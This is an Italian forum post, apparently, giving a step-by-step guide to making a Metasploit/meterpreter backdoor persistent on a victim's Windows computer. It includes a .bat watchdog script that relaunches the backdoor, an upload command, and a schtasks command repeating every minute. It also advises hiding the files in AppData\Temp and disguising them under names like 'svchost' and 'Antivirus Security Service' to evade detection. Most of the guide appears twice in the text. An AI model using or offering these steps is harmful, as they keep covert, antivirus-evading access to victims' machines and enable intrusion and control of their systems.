Salve, dati i miei recenti "studi" riguardo il funzionamento delle backdoors, ho incontrato un fondamentale problema riguardante il rendere una backdoors persistente.
Piccola spiegazione su cosa è una backdoor persistente
Per backdoors persistente ci si riferisce, appunto a una backdoor che rimane sulla macchina della vittima e che tenta di connettersi alla macchina dell'attaccante ogni X minuti/giorni/settimane dando la possibilità, a chi ha effettuato l'attacco, di riconnettersi ogni qualvolta esso voglia.
Perché utilizzare questo metodo
Metasploit offre la possibilità di creare una persistenza utilizzando il semplice comando run persistence, ma questo crea un file che viene detectato da eventuali antivirus installati sulla macchina della vittima in quanto, a differenza della backdoor, questo non è criptato. Seguendo questa guida invece, avrete la possibilità di avere una backdoor persistente con il semplice utilizzo di un file .bat e di un comando da utilizzare dopo aver avviato la shell sulla macchina della vittima con il relativo comando shell.
Spiegazione su questo metodo
Creare un file .bat con questo contenuto
@Echo off
tasklist | findstr /i nomebackdoor.exe
if %errorlevel% neq 0 goto restart
goto end
:restart
start "" "posizione backdoor"
:end
exit
dove dovrete modificare alcuni parametri quali :
posizione backdoor : indicare la posizione della vostra backdoor nel filesystem della macchina della vittima.
nomebackdoor : indicare il nome della vostra backdoor (quindi il nome del processo) indicando anche l'estensione.
Una volta fatto ciò, un requisito ovviamente importante è aver stabilito una connessione meterpreter con la vittima. Dando per scontato che tale requisito sia soddisfatto, continuare con la guida.
Utilizzare il comando upload seguendo questa sintassi
upload file.bat directory
file.bat : Il file da caricare, ovviamente dobbiamo caricare il file.bat creato precedentemente
directory : E' dove vogliamo che il file venga caricato nella macchina della vittima (consiglio la cartella Temp in AppData)
Una volta fatto ciò, avviare la shell utilizzando il comando shell e impostare l'attività da far ripetere X minuti/ore/giorni/settimane (quando desiderate quindi) con il comando
schtasks /create /sc minute /mo 1 /tr posizione_file_bat /tn nome_attività
Nell'esempio che ho riportato, ho impostato che l'attività deve ripetersi ogni 1 minuti, ma questi parametri possono essere cambiati.
/sc può essere cambiato in HOURLY, DAILY, WEEKLY, MONTHLY
/mo può essere cambiato seguendo questa tabella
1-1439 (per minute)
1-23 (per hourly)
1-365 (per daily)
1-52 (per weekly)
1-12 (per monthly)
/tr è la posizione del file bat nel file system della macchina della vittima
/tn è il nome dell'attività che apparirà in schtasks
Dopo aver scritto questo comando, semplicemente premere invio e la nuova attività verrà creata. Abbiamo completato il nostro lavoro e creato la persistenza.
Consigli utili
- Dopo aver stabilito la prima connessione con la macchina della vittima, aprire una shell e copiare la backdoor in una directory che ovviamente non sia il desktop, consiglio vivamente la cartella Temp in AppData.
- Consiglio di rinominare il file bat con un nome che ovviamente non sia "backdoor" o "virus", ma magari qualcosa di simile a "svchost" o qualsiasi altro nome non facilmente sgamabile.
- Consiglio di nominare l'attività del schtasks con un nome altrettanto non sgamabile, magari qualcosa di simile a "Antivirus Security Service".
Spero di essere stato chiaro in questa guida, per qualsiasi dubbio scrivete pure e io sarò disponibile a rispondere nel modo più completo possibile.
Prima di salutare però vorrei precisare che questo è uno dei tanti metodi per creare una backdoor persistente senza l'utilizzo del comando run persistence. Avrò sicuramente modo di provare altri metodi, in caso di esito positivo sarò lieto di condividerli.
Saluti, Sekmet.-
Piccola spiegazione su cosa è una backdoor persistente
Per backdoors persistente ci si riferisce, appunto a una backdoor che rimane sulla macchina della vittima e che tenta di connettersi alla macchina dell'attaccante ogni X minuti/giorni/settimane dando la possibilità, a chi ha effettuato l'attacco, di riconnettersi ogni qualvolta esso voglia.
Perché utilizzare questo metodo
Metasploit offre la possibilità di creare una persistenza utilizzando il semplice comando run persistence, ma questo crea un file che viene detectato da eventuali antivirus installati sulla macchina della vittima in quanto, a differenza della backdoor, questo non è criptato. Seguendo questa guida invece, avrete la possibilità di avere una backdoor persistente con il semplice utilizzo di un file .bat e di un comando da utilizzare dopo aver avviato la shell sulla macchina della vittima con il relativo comando shell.
Spiegazione su questo metodo
Creare un file .bat con questo contenuto
@Echo off
tasklist | findstr /i nomebackdoor.exe
if %errorlevel% neq 0 goto restart
goto end
:restart
start "" "posizione backdoor"
:end
exit
dove dovrete modificare alcuni parametri quali :
posizione backdoor : indicare la posizione della vostra backdoor nel filesystem della macchina della vittima.
nomebackdoor : indicare il nome della vostra backdoor (quindi il nome del processo) indicando anche l'estensione.
Una volta fatto ciò, un requisito ovviamente importante è aver stabilito una connessione meterpreter con la vittima. Dando per scontato che tale requisito sia soddisfatto, continuare con la guida.
Utilizzare il comando upload seguendo questa sintassi
upload file.bat directory
file.bat : Il file da caricare, ovviamente dobbiamo caricare il file.bat creato precedentemente
directory : E' dove vogliamo che il file venga caricato nella macchina della vittima (consiglio la cartella Temp in AppData)
Una volta fatto ciò, avviare la shell utilizzando il comando shell e impostare l'attività da far ripetere X minuti/ore/giorni/settimane (quando desiderate quindi) con il comando
schtasks /create /sc minute /mo 1 /tr posizione_file_bat /tn nome_attività
Nell'esempio che ho riportato, ho impostato che l'attività deve ripetersi ogni 1 minuti, ma questi parametri possono essere cambiati.
/sc può essere cambiato in HOURLY, DAILY, WEEKLY, MONTHLY
/mo può essere cambiato seguendo questa tabella
1-1439 (per minute)
1-23 (per hourly)
1-365 (per daily)
1-52 (per weekly)
1-12 (per monthly)
/tr è la posizione del file bat nel file system della macchina della vittima
/tn è il nome dell'attività che apparirà in schtasks
Dopo aver scritto questo comando, semplicemente premere invio e la nuova attività verrà creata. Abbiamo completato il nostro lavoro e creato la persistenza.
Consigli utili
- Dopo aver stabilito la prima connessione con la macchina della vittima, aprire una shell e copiare la backdoor in una directory che ovviamente non sia il desktop, consiglio vivamente la cartella Temp in AppData.
- Consiglio di rinominare il file bat con un nome che ovviamente non sia "backdoor" o "virus", ma magari qualcosa di simile a "svchost" o qualsiasi altro nome non facilmente sgamabile.
- Consiglio di nominare l'attività del schtasks con un nome altrettanto non sgamabile, magari qualcosa di simile a "Antivirus Security Service".
Spero di essere stato chiaro in questa guida, per qualsiasi dubbio scrivete pure e io sarò disponibile a rispondere nel modo più completo possibile.
Prima di salutare però vorrei precisare che questo è uno dei tanti metodi per creare una backdoor persistente senza l'utilizzo del comando run persistence. Avrò sicuramente modo di provare altri metodi, in caso di esito positivo sarò lieto di condividerli.
Saluti, Sekmet.-